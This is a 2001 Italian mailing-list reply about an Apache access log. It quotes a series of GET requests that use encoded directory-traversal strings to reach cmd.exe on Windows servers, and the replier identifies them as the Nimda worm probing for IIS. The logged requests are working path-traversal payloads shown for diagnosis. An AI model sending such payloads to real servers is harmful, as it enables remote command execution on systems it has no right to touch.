Re: Apache
On Wed, Sep 19, 2001 at 11:47:05AM +0200, Stefano Simonucci wrote:
> Nel file
>
> /var/log/apache/access.log
> mi sono ritrovato una sfilza di messaggi del tipo
>
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
> "-"
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
> "-"
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
> "-"
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
> "-"
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-"
> "-"
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-"
> "-"
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
> "-" "-"
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-"
>
> da vari indirizzi (che iniziavono per 193.204 ... .... Il mio e'
> 193.204.9.228)
>
E' Nimda in azione, fratello di code red.
Ovviamente rivolto a iis.
Biko
--
------------------------------------------------------------------------------
Ho appreso che quando un neonato afferra con il suo piccolo pugno, per la
prima volta, il dito di suo padre, lo tiene intrappolato per sempre.
------------------------------------------------------------------------------
Reply to:
- Follow-Ups:
- APT e proxy http.
- From: "Renzo Vermicelli CeSIA Univ. Bologna" <renzov@kaiser.alma.unibo.it>
- References:
- Apache
- From: Stefano Simonucci <stefano@pcsim.unicam.it>